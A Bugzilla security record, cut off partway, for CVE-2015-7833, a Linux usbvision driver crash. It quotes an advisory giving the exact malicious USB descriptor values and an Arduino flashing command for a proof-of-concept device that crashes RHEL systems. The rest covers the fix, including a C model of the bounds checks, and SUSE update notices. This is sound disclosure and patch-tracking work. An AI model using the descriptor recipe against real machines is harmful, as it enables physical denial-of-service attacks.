Bugzilla – Bug 950998
VUL-1: CVE-2015-7833: kernel: usbvision: crash on invalid USB device descriptors
Last modified: 2020-06-08 23:22:14 UTC
http://seclists.org/bugtraq/2015/Oct/35

OS-S Security Advisory 2015-04
http://www.os-s.net/advisories/DOS-KernelCrashesOnInvalidUSBDeviceDescriptors-UsbvisionDriver.pdf

CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)

The Kernel 3.10.0-123.20.1.el7.x86_64 crashes when presented with a buggy USB device which requires the usbvision driver. All subsequently published kernel updates crash as well.

Detailed product description confirmed the bug on the following system:
RHEL 7.3 kernel >= 3.10.0-123.20.1.el7.x86_64

[...]

###[ USB_Device_Descriptor ]###
bLength = 18
bDescriptorType= 0x1
bcdUSB = 0x200
bDeviceClass= 0xff
bDeviceSubClass= 0
bDeviceProtocol= 0
bMaxPacketSize= 64
isVendor = 0x573
idProduct = 0x4d26
bcdDevice = 0x100
iManufacturer= 1
iProduct = 2
iSerialNumber= 3
bNumConfigurations= 1

This is the configuration descriptor containing the malicious value for bInterfaceNumber causing the crash. Any number but 0 crashes the system.

###[ USB_Configuration_Descriptor ]###
bLength = 9
bDescriptorType= 0x2
wTotalLength= 0x27
bNumInterfaces= 1
bConfigurationValue= 1
iConfiguration= 0
bmAttributes= Remote_Wakeup+Self_Powered+Reserved_D7
bMaxPower = 49

###[ USB_Interface_Descriptor ]###
bLength = 9
bDescriptorType= 0x4
bInterfaceNumber= 255
bAlternateSetting= 0
bNumEndpoints= 3
bInterfaceClass= 0xff
bInterfaceSubClass= 0x0
bInterfaceProtocol= 0x0
iInterface= 0

###[ USB_Endpoint_Descriptor ]###
bLength = 7
bDescriptorType= 0x5
bEndpointAddress= 0x81
bmAttribut= 0x3
wMaxPacketSize= 1028
bInterval = 12

###[ USB_Endpoint_Descriptor ]###
bLength = 7
bDescriptorType= 0x5
bEndpointAddress= 0x1
bmAttribut= 0x2
wMaxPacketSize= 4
bInterval = 12

###[ USB_Endpoint_Descriptor ]###
bLength = 7
bDescriptorType= 0x5
bEndpointAddress= 0x82
bmAttribut= 0x1
wMaxPacketSize= 4
bInterval = 12

Proof of Concept
For a proof of concept we are providing an Arduino firmware file. Just flash it on Arduino Leonardo and plug it into any RHEL machine. The Arduino will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex

The file binary.hex has been attached to this bug report

To prevent automated sending of payloads, use a jumper to connect port D3 and 3V3!

Severity and Ease of Exploitation
The security weakness can be easily exploited. Using our arduino firmware only physical access to the system is required.

Vendor Communication
We unsuccessfully tried to contact the vendor for several months. We never received any response on our bugtraq ticket: https://bugzilla.redhat.com/show_bug.cgi?id=1201858

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1270158
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7833
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7833
bugbot adjusting priority
Created attachment 653350
fix the overflow of the interfaces array by sanity checking
- the pointer is checked for NULL
- array overflows are handled by range checking
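The attachment description above names two checks: a range check and a NULL check. The following is an added illustration, a user-space C model written for this page and not the attached patch or kernel source, showing why a device-supplied bInterfaceNumber needs both before it is used as an index. It assumes a 32-slot interface table filled in order of appearance; all names (`parse_config`, `lookup_checked`, `probe_model`, `probe_sample`, `MAX_INTERFACES`) are hypothetical, and the sample bytes are constructed from the descriptor dump in the advisory.

```c
/* Added illustration: user-space model, not kernel or usbvision source. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_INTERFACES 32   /* assumption: capacity of the interface table */
#define DT_CONFIG      0x02
#define DT_INTERFACE   0x04

struct iface {
    uint8_t number;         /* bInterfaceNumber, device-controlled */
    uint8_t num_endpoints;  /* bNumEndpoints */
};

struct config {
    unsigned count;                          /* interfaces actually parsed */
    struct iface storage[MAX_INTERFACES];
    struct iface *interface[MAX_INTERFACES]; /* filled in order of appearance */
};

/* Constructed sample: the 39-byte (wTotalLength 0x27) configuration from the
 * advisory's dump, here with bInterfaceNumber = 0 at offset 11. */
static const uint8_t SAMPLE_CONFIG[39] = {
    0x09, 0x02, 0x27, 0x00, 0x01, 0x01, 0x00, 0xE0, 0x31, /* configuration */
    0x09, 0x04, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, /* interface */
    0x07, 0x05, 0x81, 0x03, 0x04, 0x04, 0x0C,             /* endpoint 0x81 */
    0x07, 0x05, 0x01, 0x02, 0x04, 0x00, 0x0C,             /* endpoint 0x01 */
    0x07, 0x05, 0x82, 0x01, 0x04, 0x00, 0x0C,             /* endpoint 0x82 */
};

/* Walk the descriptor chain; returns 0 on success, -1 if malformed. */
int parse_config(const uint8_t *buf, size_t len, struct config *cfg)
{
    size_t off = 0, total;

    cfg->count = 0;
    for (size_t i = 0; i < MAX_INTERFACES; i++)
        cfg->interface[i] = NULL;
    if (len < 9 || buf[0] != 9 || buf[1] != DT_CONFIG)
        return -1;
    total = (size_t)buf[2] | ((size_t)buf[3] << 8);
    if (total > len)                 /* wTotalLength beyond received data */
        return -1;
    while (off + 2 <= total) {
        uint8_t blen = buf[off], btype = buf[off + 1];
        if (blen < 2 || off + blen > total)
            return -1;
        if (btype == DT_INTERFACE) {
            if (blen < 9 || cfg->count >= MAX_INTERFACES)
                return -1;
            struct iface *it = &cfg->storage[cfg->count];
            it->number = buf[off + 2];
            it->num_endpoints = buf[off + 4];
            cfg->interface[cfg->count++] = it;
        }
        off += blen;
    }
    return off == total ? 0 : -1;
}

/* Range check first: an index >= MAX_INTERFACES would read past the table.
 * The result may still be NULL, because only `count` slots are populated. */
struct iface *lookup_checked(struct config *cfg, unsigned ifnum)
{
    if (ifnum >= MAX_INTERFACES)
        return NULL;
    return cfg->interface[ifnum];
}

/* Model of a probe that indexes the table with the device's own number.
 * Returns the endpoint count, or -1 when the device is rejected. */
int probe_model(const uint8_t *buf, size_t len)
{
    struct config cfg;

    if (parse_config(buf, len, &cfg) != 0 || cfg.count == 0)
        return -1;
    struct iface *it = lookup_checked(&cfg, cfg.interface[0]->number);
    if (it == NULL)                  /* NULL check: unpopulated slot */
        return -1;
    return it->num_endpoints;
}

/* Run the probe on the sample with bInterfaceNumber patched to `ifnum`. */
int probe_sample(uint8_t ifnum)
{
    uint8_t buf[sizeof(SAMPLE_CONFIG)];

    memcpy(buf, SAMPLE_CONFIG, sizeof(buf));
    buf[11] = ifnum;
    return probe_model(buf, sizeof(buf));
}

int main(void)
{
    const uint8_t cases[] = { 0, 1, 255 };

    for (size_t i = 0; i < sizeof(cases); i++)
        printf("bInterfaceNumber=%u -> %d\n", (unsigned)cases[i],
               probe_sample(cases[i]));
    return 0;
}
```

In this model a value of 1 to 31 passes the range check but hits an empty slot, while 32 to 255 is outside the table, so neither check alone covers every nonzero value.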
Created attachment 656040
backport for SP3
Fix submitted to the vulnerable kernel trees.
SUSE-SU-2015:2194-1: An update that solves 8 vulnerabilities and has 45 fixes is now available. Category: security (important) Bug References: 814440,867595,904348,921949,924493,930145,933514,935961,936076,936773,939826,939926,940853,941202,941867,942938,944749,945626,946078,947241,947321,947478,948521,948685,948831,949100,949463,949504,949706,949744,950013,950750,950862,950998,951110,951165,951199,951440,951546,952666,952758,953796,953980,954635,955148,955224,955422,955533,955644,956047,956053,956703,956711 CVE References: CVE-2015-0272,CVE-2015-2925,CVE-2015-5283,CVE-2015-5307,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104 Sources used: SUSE Linux Enterprise Workstation Extension 12 (src): kernel-default-3.12.51-52.31.1 SUSE Linux Enterprise Software Development Kit 12 (src): kernel-docs-3.12.51-52.31.5, kernel-obs-build-3.12.51-52.31.1 SUSE Linux Enterprise Server 12 (src): kernel-default-3.12.51-52.31.1, kernel-source-3.12.51-52.31.1, kernel-syms-3.12.51-52.31.1, kernel-xen-3.12.51-52.31.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.51-52.31.1 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12_Update_9-1-2.2 SUSE Linux Enterprise Desktop 12 (src): kernel-default-3.12.51-52.31.1, kernel-source-3.12.51-52.31.1, kernel-syms-3.12.51-52.31.1, kernel-xen-3.12.51-52.31.1
SUSE-SU-2015:2292-1: An update that solves 7 vulnerabilities and has 54 fixes is now available. Category: security (important) Bug References: 758040,814440,904348,921949,924493,926238,933514,936773,939826,939926,940776,941113,941202,943959,944296,947241,947478,949100,949192,949706,949744,949936,950013,950580,950750,950998,951110,951165,951440,951638,951864,952384,952666,953717,953826,953830,953971,953980,954635,954986,955136,955148,955224,955354,955422,955533,955644,956047,956053,956147,956284,956703,956711,956717,956801,956876,957395,957546,958504,958510,958647 CVE References: CVE-2015-0272,CVE-2015-2925,CVE-2015-5156,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8215 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.51-60.20.2 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.51-60.20.2, kernel-obs-build-3.12.51-60.20.1 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.51-60.20.2, kernel-source-3.12.51-60.20.2, kernel-syms-3.12.51-60.20.2, kernel-xen-3.12.51-60.20.2 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.51-60.20.2 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_1-1-4.1 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.51-60.20.2, kernel-source-3.12.51-60.20.2, kernel-syms-3.12.51-60.20.2, kernel-xen-3.12.51-60.20.2
SUSE-SU-2015:2339-1: An update that solves 10 vulnerabilities and has 57 fixes is now available. Category: security (important) Bug References: 814440,879378,879381,900610,904348,904965,921081,926774,930145,930770,930788,930835,932805,935123,935757,937256,937444,938706,939826,939926,939955,940017,940913,940946,941202,942938,943786,944296,944677,944831,944837,944989,944993,945691,945825,945827,946078,946214,946309,947957,948330,948347,948521,949100,949298,949502,949706,949744,949936,949981,950298,950750,950998,951440,952084,952384,952579,952976,953527,953799,953980,954404,954628,954950,954984,955673,956709 CVE References: CVE-2015-0272,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7509,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): kernel-docs-3.0.101-68.2 SUSE Linux Enterprise Server 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-ec2-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-source-3.0.101-68.1, kernel-syms-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-default-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Desktop 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-source-3.0.101-68.1, kernel-syms-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-default-3.0.101-68.1, kernel-ec2-3.0.101-68.1, kernel-pae-3.0.101-68.1, kernel-ppc64-3.0.101-68.1, kernel-trace-3.0.101-68.1, kernel-xen-3.0.101-68.1
SUSE-SU-2015:2350-1: An update that solves 10 vulnerabilities and has 62 fixes is now available. Category: security (important) Bug References: 814440,879378,879381,900610,904348,904965,921081,926709,926774,930145,930770,930788,930835,932805,935053,935123,935757,937256,937444,937969,937970,938706,939207,939826,939926,939955,940017,940913,940946,941202,942938,943786,944677,944831,944837,944989,944993,945691,945825,945827,946078,946214,946309,947957,948330,948347,948521,949100,949298,949502,949706,949744,949936,949981,950298,950750,950998,951440,952084,952384,952579,952976,953527,953799,953980,954404,954628,954950,954984,955354,955673,956709 CVE References: CVE-2015-0272,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7509,CVE-2015-7799,CVE-2015-7872,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215 Sources used: SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-48.1, kernel-rt_trace-3.0.101.rt130-48.1, kernel-source-rt-3.0.101.rt130-48.1, kernel-syms-rt-3.0.101.rt130-48.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-48.1, kernel-rt_debug-3.0.101.rt130-48.1, kernel-rt_trace-3.0.101.rt130-48.1
openSUSE-SU-2016:0280-1: An update that solves 10 vulnerabilities and has 18 fixes is now available. Category: security (important) Bug References: 865096,865259,913996,950178,950998,952621,954324,954532,954647,955422,956708,957152,957988,957990,958439,958463,958504,958510,958886,958951,959190,959399,960021,960710,961263,961509,962075,962597 CVE References: CVE-2015-7550,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE Leap 42.1 (src): kernel-debug-4.1.15-8.1, kernel-default-4.1.15-8.1, kernel-docs-4.1.15-8.3, kernel-ec2-4.1.15-8.1, kernel-obs-build-4.1.15-8.2, kernel-obs-qa-4.1.15-8.1, kernel-obs-qa-xen-4.1.15-8.1, kernel-pae-4.1.15-8.1, kernel-pv-4.1.15-8.1, kernel-source-4.1.15-8.1, kernel-syms-4.1.15-8.1, kernel-vanilla-4.1.15-8.1, kernel-xen-4.1.15-8.1
openSUSE-SU-2016:0301-1: An update that solves 57 vulnerabilities and has 21 fixes is now available. Category: security (important) Bug References: 814440,851610,869564,873385,906545,907818,909077,909477,911326,912202,915517,915577,917830,918333,919007,919018,919463,919596,921313,921949,922583,922936,922944,926238,926240,927780,927786,928130,929525,930399,931988,932348,933896,933904,933907,933934,935542,935705,936502,936831,937032,937033,937969,938706,940338,944296,945825,947155,949936,950998,951194,951440,951627,952384,952579,952976,953052,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075 CVE References: CVE-2014-2568,CVE-2014-8133,CVE-2014-8989,CVE-2014-9090,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2014-9715,CVE-2014-9728,CVE-2014-9729,CVE-2014-9730,CVE-2014-9731,CVE-2015-0272,CVE-2015-0777,CVE-2015-1420,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-2925,CVE-2015-3212,CVE-2015-3339,CVE-2015-3636,CVE-2015-4001,CVE-2015-4002,CVE-2015-4003,CVE-2015-4004,CVE-2015-4036,CVE-2015-4167,CVE-2015-4692,CVE-2015-4700,CVE-2015-5157,CVE-2015-5283,CVE-2015-5307,CVE-2015-5364,CVE-2015-5366,CVE-2015-5707,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7833,CVE-2015-7872,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE 13.1 (src): cloop-2.639-11.22.2, crash-7.0.2-2.22.2, hdjmod-1.28-16.22.2, ipset-6.21.1-2.26.2, iscsitarget-1.4.20.3-13.22.2, kernel-debug-3.11.10-32.1, kernel-default-3.11.10-32.1, kernel-desktop-3.11.10-32.1, kernel-docs-3.11.10-32.3, kernel-ec2-3.11.10-32.1, kernel-pae-3.11.10-32.1, kernel-source-3.11.10-32.1, kernel-syms-3.11.10-32.1, kernel-trace-3.11.10-32.1, kernel-vanilla-3.11.10-32.1, kernel-xen-3.11.10-32.1, ndiswrapper-1.58-22.1, pcfclock-0.44-258.22.1, 
vhba-kmp-20130607-2.23.1, virtualbox-4.2.36-2.55.1, xen-4.3.4_10-56.1, xtables-addons-2.3-2.22.1
openSUSE-SU-2016:0318-1: An update that solves 19 vulnerabilities and has 18 fixes is now available. Category: security (important) Bug References: 814440,906545,912202,921949,937969,937970,938706,944296,945825,949936,950998,951627,951638,952384,952579,952976,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075 CVE References: CVE-2014-8989,CVE-2014-9529,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE 13.2 (src): bbswitch-0.8-3.15.1, cloop-2.639-14.15.1, crash-7.0.8-15.1, hdjmod-1.28-18.16.1, ipset-6.23-15.1, kernel-debug-3.16.7-32.1, kernel-default-3.16.7-32.1, kernel-desktop-3.16.7-32.1, kernel-docs-3.16.7-32.2, kernel-ec2-3.16.7-32.1, kernel-obs-build-3.16.7-32.2, kernel-obs-qa-3.16.7-32.1, kernel-obs-qa-xen-3.16.7-32.1, kernel-pae-3.16.7-32.1, kernel-source-3.16.7-32.1, kernel-syms-3.16.7-32.1, kernel-vanilla-3.16.7-32.1, kernel-xen-3.16.7-32.1, pcfclock-0.44-260.15.1, vhba-kmp-20140629-2.15.1, virtualbox-4.3.34-37.1, xen-4.4.3_08-38.1, xtables-addons-2.6-15.1
SUSE-SU-2016:1203-1: An update that solves 41 vulnerabilities and has 49 fixes is now available. Category: security (important) Bug References: 758040,781018,879378,879381,904035,924919,934787,935123,937444,939955,940017,940413,940913,940946,941514,942082,946122,947128,948330,949298,949752,949936,950750,950998,951392,952976,954628,955308,955354,955654,955673,956375,956514,956707,956708,956709,956852,956949,957988,957990,958463,958886,958906,958912,958951,959190,959312,959399,959705,960857,961500,961509,961512,961516,961518,963276,963765,963767,963998,964201,965319,965923,966437,966693,967863,967972,967973,967974,967975,968010,968011,968012,968013,968141,968670,969307,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971360,973570,974646,975945 CVE References: CVE-2013-7446,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3955 Sources used: SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Manager Proxy 2.1 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, 
kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-ppc64-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
This bug has been fixed twice. Both fixes have gone upstream. The fix I applied to our kernel trees is incorrect. It has been reverted upstream. It needs to be exchanged for the correct fix from upstream. How do we do this?
(In reply to Oliver Neukum from comment #21)
> This bug has been fixed twice. Both fixes have gone upstream. My fix I
> applied to our kernel trees is incorrect. It has been reverted in upstream.
> It needs to be exchanged against the correct fix from upstream. How do we do
> this?
Why doesn't dropping the patch [1] from all the trees and replacing it by the upstream one work?
[1] I guess patches.drivers/0001-usbvision-fix-overflow-of-interfaces-array.patch
I think that's the right way to go. Just replace the fix and it will go out during the next kernel update round.
(In reply to Alexander Bergmann from comment #23)
> I think that's the right way to go. Just replace the fix and it will go out
> during the next kernel update round.
Done.
released
SUSE-SU-2016:1937-1: An update that solves 24 vulnerabilities and has 76 fixes is now available. Category: security (important) Bug References: 662458,676471,897662,928547,944309,945345,947337,950998,951844,953048,953233,954847,956491,957805,957986,957990,958390,958463,960857,962742,962846,963762,964727,965087,966245,967640,968667,969016,970114,970506,970604,970609,970948,971049,971770,971947,972124,972933,973378,973499,973570,974165,974308,974620,974646,974692,975533,975772,975788,976739,976821,976868,977417,977582,977685,978401,978469,978527,978822,979169,979213,979347,979419,979485,979489,979521,979548,979867,979879,979922,980246,980348,980371,980706,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983394,983721,983904,983977,984148,984456,984755,985232,985978,986362,986569,986572,986811,988215,988498,988552 CVE References: CVE-2014-9717,CVE-2014-9904,CVE-2015-7833,CVE-2015-8539,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2847,CVE-2016-3672,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.61-60.18.1, kernel-compute_debug-3.12.61-60.18.1, kernel-rt-3.12.61-60.18.1, kernel-rt_debug-3.12.61-60.18.1, kernel-source-rt-3.12.61-60.18.1, kernel-syms-rt-3.12.61-60.18.1
SUSE-SU-2016:1985-1: An update that solves 20 vulnerabilities and has 43 fixes is now available. Category: security (important) Bug References: 676471,866130,909589,936530,944309,950998,953369,954847,956491,957986,960857,961518,963762,966245,967914,968500,969149,969391,970114,971030,971126,971360,971446,971944,971947,971989,973378,974620,974646,974787,975358,976739,976868,978401,978821,978822,979213,979274,979347,979419,979548,979595,979867,979879,979915,980246,980371,980725,980788,980931,981231,981267,982532,982544,982691,983143,983213,983721,984107,984755,986362,986572,988498 CVE References: CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-5244,CVE-2016-5829 Sources used: SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-57.1, kernel-rt_trace-3.0.101.rt130-57.1, kernel-source-rt-3.0.101.rt130-57.1, kernel-syms-rt-3.0.101.rt130-57.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-57.1, kernel-rt_debug-3.0.101.rt130-57.1, kernel-rt_trace-3.0.101.rt130-57.1
SUSE-SU-2016:2105-1: An update that solves 21 vulnerabilities and has 55 fixes is now available. Category: security (important) Bug References: 947337,950998,951844,953048,954847,956491,957990,962742,963655,963762,965087,966245,968667,970114,970506,971770,972933,973378,973499,974165,974308,974620,975531,975533,975772,975788,977417,978401,978469,978822,979074,979213,979419,979485,979489,979521,979548,979681,979867,979879,979922,980348,980363,980371,980856,980883,981038,981143,981344,981597,982282,982354,982544,982698,983143,983213,983318,983721,983904,983977,984148,984456,984755,984764,985232,985978,986362,986365,986569,986572,986573,986811,988215,988498,988552,990058 CVE References: CVE-2014-9904,CVE-2015-7833,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-3672,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.62-60.62.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.62-60.62.3, kernel-obs-build-3.12.62-60.62.1 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.62-60.62.1, kernel-source-3.12.62-60.62.1, kernel-syms-3.12.62-60.62.1, kernel-xen-3.12.62-60.62.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.62-60.62.1 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_7-1-4.2 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.62-60.62.1, kernel-source-3.12.62-60.62.1, kernel-syms-3.12.62-60.62.1, kernel-xen-3.12.62-60.62.1
openSUSE-SU-2016:2184-1: An update that solves 21 vulnerabilities and has 49 fixes is now available. Category: security (important) Bug References: 947337,950998,951844,953048,954847,956491,957990,962742,963655,963762,965087,966245,968667,970114,970506,971770,972933,973378,973499,974165,974308,974620,975531,975533,975772,975788,977417,978401,978469,978822,979213,979419,979485,979489,979521,979548,979681,979867,979879,979922,980348,980363,980371,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983721,983904,983977,984148,984456,984755,985232,985978,986362,986365,986569,986572,986811,988215,988498,988552,990058 CVE References: CVE-2014-9904,CVE-2015-7833,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-3672,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: openSUSE 13.1 (src): cloop-2.639-11.32.2, crash-7.0.2-2.32.7, hdjmod-1.28-16.32.2, ipset-6.21.1-2.36.2, iscsitarget-1.4.20.3-13.32.2, kernel-debug-3.12.62-52.1, kernel-default-3.12.62-52.1, kernel-desktop-3.12.62-52.1, kernel-docs-3.12.62-52.2, kernel-ec2-3.12.62-52.1, kernel-pae-3.12.62-52.1, kernel-source-3.12.62-52.1, kernel-syms-3.12.62-52.1, kernel-trace-3.12.62-52.1, kernel-vanilla-3.12.62-52.1, kernel-xen-3.12.62-52.1, ndiswrapper-1.58-33.2, openvswitch-1.11.0-0.39.3, pcfclock-0.44-258.33.2, vhba-kmp-20130607-2.32.2, virtualbox-4.2.36-2.64.4, xen-4.3.4_10-65.3, xtables-addons-2.3-2.31.2
SUSE-SU-2016:2245-1: An update that solves 25 vulnerabilities and has 22 fixes is now available. Category: security (important) Bug References: 839104,866130,919351,944309,950998,960689,962404,963655,963762,966460,969149,970114,971126,971360,971446,971729,971944,974428,975945,978401,978821,978822,979213,979274,979548,979681,979867,979879,980371,980725,980788,980931,981267,983143,983213,983535,984107,984755,986362,986365,986445,986572,987709,988065,989152,989401,991608 CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3955,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5696,CVE-2016-5829,CVE-2016-6480 Sources used: SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Manager Proxy 2.1 (src): 